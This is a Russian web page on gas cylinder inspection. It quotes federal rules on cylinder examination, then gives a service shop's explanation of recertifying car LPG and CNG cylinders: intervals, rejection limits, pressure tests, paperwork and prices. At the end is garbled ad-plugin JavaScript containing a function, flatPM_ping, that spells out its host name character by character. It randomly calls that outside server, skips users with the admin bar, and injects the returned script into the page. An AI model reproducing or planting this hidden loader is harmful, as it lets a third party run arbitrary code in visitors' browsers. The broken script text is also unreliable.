а) год и месяц проверки пористой массы;

б) индивидуальное клеймо наполнительной станции;

в) клеймо диаметром 12 мм с изображением букв «Пм», удостоверяющее проверку пористой массы.

498. Баллоны для ацетилена, наполненные пористой массой, при освидетельствовании испытывают азотом под давлением 3,5 МПа.

Чистота азота, применяемого для испытания баллонов, должна быть не ниже 97% по объему.

499. Результаты освидетельствования баллонов для растворенного ацетилена заносят в журнал испытания, имеющий, в частности, следующие графы:

а) номер баллона;

б) товарный знак изготовителя;

в) дата (месяц, год) изготовления баллона;

г) фамилия, инициалы и подпись представителя организации (индивидуального предпринимателя), проводившей освидетельствование;

д) дата проведенного и следующего освидетельствования баллона.

500. Осмотр баллонов следует проводить в целях выявления на их стенках следов коррозии, трещин, вмятин и других повреждений, способных оказать влияние на безопасность при дальнейшей эксплуатации баллонов (для установления пригодности баллонов к дальнейшей эксплуатации до даты проведения следующего технического освидетельствования). Композитные и металлокомпозитные баллоны необходимо осматривать на предмет повреждения и отслоения композитной намотки.

Перед осмотром баллоны должны быть тщательно очищены и промыты водой, а баллоны, предназначенные для сред, отнесенных к группе 1 в соответствии с ТР ТС 032/2013, промыты соответствующим растворителем или дегазированы (дезактивированы).

501. Баллоны, в которых при осмотре наружной и внутренней поверхностей выявлены недопустимые дефекты, указанные в производственной инструкции по освидетельствованию (в частности, трещины, плены, вмятины, отдулины, раковины и риски глубиной более 10% номинальной толщины стенки; надрывы и выщербления; износ резьбы горловины), должны быть выбракованы.

Ослабление кольца на горловине баллона не может служить причиной браковки последнего. В этом случае баллон может быть допущен к дальнейшему освидетельствованию после закрепления кольца или замены его новым.

Баллоны, у которых обнаружена косая или слабая насадка башмака, к дальнейшему освидетельствованию не допускаются до перенасадки башмака.

Закрепление или замена ослабленного кольца на горловине или башмаке должны быть выполнены до освидетельствования баллона.

502. Отбраковка баллонов по результатам наружного и внутреннего осмотра должна быть произведена в соответствии с производственной инструкцией и технической документацией предприятия — изготовителя баллона.

Запрещается эксплуатация баллонов, на которых перебиты данные или выбиты (нанесены) не все данные, предусмотренные пунктом 481 настоящих ФНП.

503. При отсутствии указаний предприятия-изготовителя на браковку стальные бесшовные стандартные баллоны вместимостью от 12 до 55 литров при уменьшении массы на 7,5% и выше, а также при увеличении их вместимости более чем на 1% бракуют и изымают из эксплуатации.

Фактическую вместимость баллона определяют: по разности между массой баллона, наполненного водой, и массой порожнего баллона; с помощью мерных бачков или иным, установленным в производственной инструкции способом, обеспечивающим необходимую точность измерения.

504. Гидравлические испытания баллонов должны проводиться на специально оборудованных стендах, обеспечивающих безопасность при испытаниях. Величина пробного давления и время выдержки баллонов под пробным давлением должны указываться изготовителем в технической документации на баллоны (в руководстве по эксплуатации и (или) методике проведения технического освидетельствования (диагностирования)), при этом пробное давление должно быть не менее, чем полуторное рабочее давление. Пробное давление для баллонов, изготовленных из материала, отношение временного сопротивления к пределу текучести которого более 2, может быть снижено до 1,25 рабочего давления.

505. Освидетельствование, браковка и маркировка баллонов, изготовленных из металлокомпозитных и композитных материалов, осуществляют в соответствии с требованиями и нормами браковки, установленными разработчиком проекта и (или) изготовителем баллона и указанными в руководстве (инструкции) по эксплуатации.

506. Уполномоченные специализированные организации по проверке (испытанию) баллонов обязаны привести забракованные баллоны в негодность независимо от их назначения любым способом, исключающим возможность их дальнейшего использования. Забракованные баллоны должны утилизироваться согласно требованиям руководства (инструкции) по эксплуатации.

507. Освидетельствование баллонов должно производиться в отдельных помещениях, специально оборудованных для его проведения в соответствии с проектом. Температура воздуха в этих помещениях должна быть не ниже 12 °C.

Для внутреннего осмотра баллонов допускается применение переносного источника электрического освещения и иных устройств, обеспечивающих возможность визуального осмотра, напряжением не выше 12 В.

При осмотре баллонов, наполняющихся взрывоопасными газами, арматура ручной лампы и ее штепсельное соединение должны быть во взрывобезопасном исполнении.

508. Наполненные газом баллоны, находящиеся на длительном складском хранении, при наступлении очередных сроков периодического освидетельствования подвергают освидетельствованию в выборочном порядке в количестве не менее 5 штук из партии до 100 баллонов, 10 штук из партии до 500 баллонов и 20 штук из партии свыше 500 баллонов.

При удовлетворительных результатах освидетельствования срок хранения баллонов устанавливает лицо, производившее освидетельствование, но не более чем два года. Результаты выборочного освидетельствования оформляют соответствующим актом.

При неудовлетворительных результатах освидетельствования производится повторное освидетельствование баллонов в таком же количестве.

В случае неудовлетворительных результатов при повторном освидетельствовании дальнейшее хранение всей партии баллонов не допускается, газ из баллонов должен быть удален в срок, указанный лицом, производившим освидетельствование, после чего баллоны должны быть подвергнуты техническому освидетельствованию каждый в отдельности.

ОСВИДЕТЕЛЬСТВОВАНИЕ БАЛЛОНОВ

Освидетельствование газовых баллонов необходимо периодически проводить автовладельцам т/с, с установленным ГБО.

Согласно правилам Ростехнадзора требуется проверять срок годности баллона, соответствие его состояния требованиям безопасности, осуществлять проверку на герметичность и проводить испытания на прочность.

Сроки освидетельствования пропановых баллонов и метановых:

  • Для пропана: 1 раз в 2 года (пропан-бутан смеси);
  • Для метана: 1 раз в 5 лет (из легированной стали) и 1 раз в 3 года (для углеродистой стали);

В соответствии с Кодексом об административных правонарушениях (см. пп. 12.5 ч.1 и 7.14) запрещается эксплуатация транспортных средств в случае, если «технические параметры, указанные на наружной поверхности газовых баллонов автомобилей и автобусов, оснащенных газовой системой питания, не соответствуют данным технического паспорта, отсутствуют даты последнего и планируемого освидетельствования».

Прежде всего, необходимо проверить срок годности баллона, установленного заводом-изготовителем. Это можно посмотреть на самой поверхности, на заводской штамповке. Если срок эксплуатации не истёк, всё ок, можно его переосвидетельствовать.

Дату очередного освидетельствования можно посмотреть на паспорте, — специальной металлической табличке, прикрепленной к баллону (для сосудов объемов до 100 литров). Для сосудов, объём которых превышает 100 литров, эту дату можно посмотреть в приложении, которое выдаётся при его установке ГБО.

Ну а далее, можно приступать к выполнению самой процедуры.

Согласно ПБ 03-576-03 «Правила устройства и безопасной эксплуатации сосудов, работающих под давлением» в освидетельствование баллона ГБО входит проведение аттестации, опрессовки и поверка баллона.

Пошаговое описание всей процедуры:

  • Осмотр, приёмка, проверка срока годности/даты очередного освидетельствования;
  • Демонтаж (снятие если требуется);
  • Мойка, очистка от грязи, стравливание газа, подготовка баллона;
  • Аттестация: проверка пригодности к эксплуатации, отбраковка, исследование соответствий нормам и стандартам, поиск дефектов;
  • Покраска баллона, зачистка, грунтовка (если требуется, при обнаружении коррозии на поверхности);
  • Опрессовка баллона: проведение испытаний на прочность и герметичность (гидравлические и/или пневматические испытания);
  • Поверка баллона: клеймение и паспортизация;
  • Монтаж на автомобиль (если требуется);

Цена освидетельствования баллона зависит от необходимых манипуляций: требуется ли демонтаж/монтаж или вы привозите уже снятый и готовый сосуд; есть ли коррозия и требуется ли косметический ремонт, перед проведением испытаний и аттестации (т.е.грунтовка, зачистка, покраска, нанесение/реставрация технических надписей на поверхности и.т.д.).

Стоимость переосвидетельствования баллонов у нас низкая, дешевле на 5-7% конкурентов, см.ниже прайс-листы.

Срок освидетельствования баллонов для автомобилей: 2 дня.

Это вызвано технологической необходимостью: требуется время на проведение испытаний по прочности и герметичности (проверку водой, воздухом, сушку баллона и пр.) и решения вопроса годности к дальнейшей эксплуатации.

Итак, после того, как баллон снят, проверены все сроки (годности и переосвидетельствования), выполняется подготовка к проведению его аттестации.

Сначала стравливается газ и осуществляется демонтаж запорной арматуры, включая мультиклапан и пр. Газоанализатором проверяется отсутствие газа в системе. Это важно. Поскольку для проведения последующих гидравлических испытаний баллона газа в системе быть не должно.

АТТЕСТАЦИЯ БАЛЛОНОВ

Аттестация заключается в проведении исследования баллона и установлении соответствия его состояния действующим нормам и пригодности к эксплуатации.

Проводится осмотр внутренней и наружной поверхности баллона. Выявляются сколы, трещины, вмятины, коррозия. Аттестация позволяет отбраковать непригодные для работы сосуды и устройства.

Требования по допуску баллона к опрессовке:

  • По ржавчине: коррозия, более 10% от общей площади поверхности баллона, делает не пригодным баллон к дальнейшей эксплуатации;
  • По деформациям: повреждения, глубиной более 10% от номинальной толщины стенки, также делают не ремонтно-пригодным такой баллон;

Во всех остальных случаях, баллон считается пригодным к эксплуатации и рекомендованным к опрессовке.

Переаттестация газовых баллонов проводится как пропановых, так и метановых сосудов. Переаттестация пропановых баллонов – 1 раз в 2 года, а ёмкостей на метане – 1 раз в 5 лет (в некоторых случаях – 1 раз в 3 года/для углеродистой стали).

Если баллон подвергся коррозии (в пределах норм естественной утраты внешнего вида), не влияющей на безопасность ГБО, то перед работами по опрессовке выполняется подготовка баллона.

Сначала делается зачистка и грунтовка, а потом выполняется покраска баллона и нанесение технической надписи на баллон.

Это доп.работы и оплачиваются дополнительно. Цены на покраску баллона, грунтовку низкие. См.ниже прайс.

ОПРЕССОВКА БАЛЛОНА

Опрессовка – это процесс проверки автомобильного баллона ГБО на прочность и герметичность.

Каким образом проводится проверка?

Выполняются гидравлические (водой) и пневматические (воздухом) испытания:

  • Гидравлические: из сосуда удаляется весь воздух и наполняется водой;

Под давлением осуществляется проверка герметичности, на течь, после чего, производится осушение (сушка) баллона;

  • Пневматические: сосуд погружается в ёмкость с водой и проводится проверка сжатым воздухом или инертным газом (в соответствии с ПБ 03-576-03, допускается замена одной процедуры на другую).

Суть та же – проверка герметичности.

После успешно пройденной опрессовки, автомобильный баллон считается годным к эксплуатации и передаётся на поверку (паспортизацию и клеймение).

ПОВЕРКА БАЛЛОНА

Поверка газового баллона (пропан и метан) служит подтверждением полного соответствия газового баллона требованиям безопасности.

После всех проверок баллона производится его паспортизация: документальное оформление разрешения на допуск и дальнейшую эксплуатацию баллона в системе ГБО.

  • Свидетельство о выполнении периодических испытаний газобаллонного оборудования, установленного на т/с (форма 2Б);

  • Отметка в паспорте даты очередного переосвидетельствования т/с;

В документах поверки газового баллона автомобиля указывается, что сосуд подвергнут наружному и внутреннему осмотру и гидравлический (пневматическим) испытаниям и признан годным для дальнейшей работы в системе ГБО автомобиля.

Результаты поверки баллона, а именно свидетельство по форме 2Б необходимо возить с собой. Оно может потребоваться для предъявления в трёх случаях: по требованию инспектора ГИБДД, при прохождении обслуживания автомобиля (ТО) и получении диагностической карты, а также на некоторых газовых заправках (в которых требуют при заправке предоставить акты поверки баллона).

ЦЕНА ОСВИДЕТЕЛЬСТВОВАНИЯ И АТТЕСТАЦИИ БАЛЛОНОВ

Стоимость работ зависит от состояния баллона ГБО, выявленного в ходе аттестации (требуется ли чистка от коррозии, грунтовка, покраска и.т.д.) и от того, требуется ли проведение доп.работ (снятие-установка или он предоставляется в демонтируемой и подготовленном, очищенной от грязи виде).

Цена освидетельствования, переаттестации, опрессовки и поверки 1 баллона (без демонтажа), включая оформление и выдачу бумаг о проведении его поверки (2а, 2б):

Если баллон имеет коррозию (не более 10% от общей поверхности сосуда), то выполняются доп.работы по покраске перед опрессовкой, согласно прайс-листу:

Зачистка + подготовка + грунтовка + покраска + нанесение тех.надписи (реставрация)

Переосвидетельствование автомобильных газовых баллонов и проверка газобаллонного оборудования

С 1 января 2015 года в России вступил в силу новый Технический регламент Таможенного союза «О безопасности колесных транспортных средств». Согласно пункту 9.8.3 ТР ТС 018/2011, ГБО на автомобилях должно подвергаться проверке и испытаниям с той же периодичностью, с которой проводится освидетельствование газовых баллонов.

Сроки эксплуатации и поверки ГБО баллонов

На каждую емкость заводом изготовителем предоставляется паспорт, в котором кроме параметров, указывается срок эксплуатации, периодичность, дата очередной проверки газовых сосудов.

Периодичность переаттестации сосудов следующая (регулируется приложением №4 к Федеральным нормам и правилам в области промышленной безопасности утверждёнными приказом Ростехнадзора № 116 от 25.03.2014 г.):

  1. Сосуды стальные для СНГ (сжиженный нефтяной газ пропан-бутан) необходимо проверять один раз в 2 года. Не зависимо от вида емкости (тороидальная или цилиндрическая).
  2. Метановые баллоны КПГ (компримированный природный газ) проверяются с периодичностью:
  • из углеродистой стали — 3 года;
  • из легированных сталей — 5 лет;
  • изготовленные из металлокомпозитных материалов, в том числе с алюминиевым лейнером — 3 года;
  • состоящие из неметаллического материала (углепластик) — 2 года.

Срок службы баллонов определяет изготовитель, как правило, он составляет:

  1. Пропановые – 10 лет;
  2. Метановые – от 15 до 20 лет, в зависимости от материала изготовления.

Если информация завода отсутствует, согласно пункту 485 «Правил промышленной безопасности опасных производственных объектов, на которых используется оборудование, работающее под избыточным давлением», срок службы ёмкости устанавливается 20 лет.

Кто и где проводит переаттестацию баллонов ГБО и проверку газобаллонного оборудования

В соответствии с пунктами 486-508 всё тех же правил, переосвидетельствование и испытание газовых ёмкостей, производят уполномоченные организации, имеющие в наличии:

  1. Оборудованное помещение (испытательный пункт);
  2. Аттестованный персонал;
  3. Индивидуальное клеймо с шифром, которое присваивается вместе с выдачей разрешения Ростехнадзора на 5 лет;
  4. Оборудование для поверки газовых емкостей (стенды).

Проверка ГБО на авто осуществляется сертифицированными предприятиями установщиками (СТО).

Другими словами, организации которые проводят освидетельствование автомобильных газовых баллонов, также проверку ГБО в целом, не всегда являются одними и теми же фирмами.

Если в вашем населённом пункте отсутствуют сервисные центры, законно уполномоченные проводить поверку ёмкостей автомобильного газового оборудования, за помощью можно обратиться в газонаполнительные станции.

Сколько стоит переосвидетельствование баллонов и проверка газового оборудования на автомобиле

Цена поверки зависит от объёма и вида сосуда, но в среднем по рынку начинается с 1200 рублей. На конечную стоимость могут повлиять дополнительные операции:

  • Демонтаж/установка;
  • дегазация;
  • чистка/мойка;
  • грунтовка, покраска;
  • мелкий ремонт или реставрация баллона.

Таким образом, стоимость может доходить до 7000 рублей за один баллон. Что зачастую будет превышать цену покупки новой ёмкости.

Плановая проверка газового оборудования стоит около 500 руб., здесь также всё зависит от модели оборудования, марки машины, устранения выявленных проблем.

Стоить отметить, что на все процедуры уходит от 1-3 дней, если делать по законным требованиям.

Многие легальные мастерские по техобслуживанию, взяв с клиента плату, проводят формальную проверку оборудования. Тут каждый выбирает сам.

Техническое освидетельствование газовых баллонов

Порядок проведения работ:

  1. Анализ документов, сверка их с маркировкой емкости;
  2. демонтаж (по необходимости дегазация) и разборка путём снятия мультиклапана или вентиля (владелец может сам снять баллон);
  3. мойка, очистка, наружный осмотр;
  4. внутренний осмотр (за исключением сосудов СУГ вместимостью до 55 литров);
  5. проверка массы и вместимости, способом наполнения водой, взвешивания пустой и наполненной емкости, затем сравнивание вычисленного объёма воды с первоначальными данными указанными в паспорте (стальные бесшовные до 12 и свыше 55 литров, а также шовные всех объемов не проверяются);
  6. проведение испытаний при помощи давления на стенде для проверки.

При осмотре выявляют трещины, коррозия, вмятины, прочие повреждения с которыми запрещается эксплуатация.

Сосуды выбраковываются если:

  • Истёк срок годности;
  • глубина раковины, риски, трещины составляет более 10% от толщины стенки;
    изношена резьба;
  • масса бесшовных баллонов объёмом от 12-55 лит. уменьшена на 7,5% и выше, также вместимость повышена от 1%;
  • коррозия занимает более 10% площади.

Сосуды проверяются на специальном оборудовании для опрессовки газовых баллонов пневматическим или гидравлическим способом. Корпуса должны выдерживать давление, которое превышает рабочую нагрузку в 2 раза. Для пропан-бутановых ёмкостей рабочее давление составляет 1,6 МПа, а для метана – 20-25 МПа.

Документы на баллоны

По завершению успешных испытаний, организация наносит (выбивает) клеймо на металлической табличке баллона, даты следующего, настоящего освидетельствования. В паспорте сосуда дублируются те же данные.

Если емкость объёмом 100 л. и более клейменее не требуется, соответствующие отметки отражаются в паспорте.

Процесс проверки ГБО на автомобиле

После установки и подключения баллона на авто, выполняется проверка газобаллонного оборудования, которая включает:

  • проверку герметичности системы под давлением;
  • регулировка работы газового оборудования;
  • содержание СО, СН выхлопа (в дизелях дымность).

По результатам теста, выдаётся свидетельство о проведении периодических испытаний ГБО (форма 2б), установленного на транспортном средстве.

Перечень документов, которые обязан иметь при себе водитель ТС, оборудованного ГБО

Водитель обязан предъявить документы на установленное оборудование во время проверки инспектора ГИБДД, по требованию сотрудника газовой заправки, при прохождении государственного техосмотра:

  • свидетельство о регистрации ТС, в котором имеется отметка о законной установке газового оборудования;
  • свидетельство формы 2б;
  • шильдик баллона с отметками о проверках;
  • паспорт с данными соответствующими табличке емкости.

Переаттестация баллона и проверка ГБО проводятся в целях обеспечения безопасной эксплуатации автомобиля с газобаллонным оборудованием. Отсутствие её документального подтверждения может стать причиной не только штрафных санкций в размере 500 руб., но и других неприятностей.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};
Яндекс.Метрика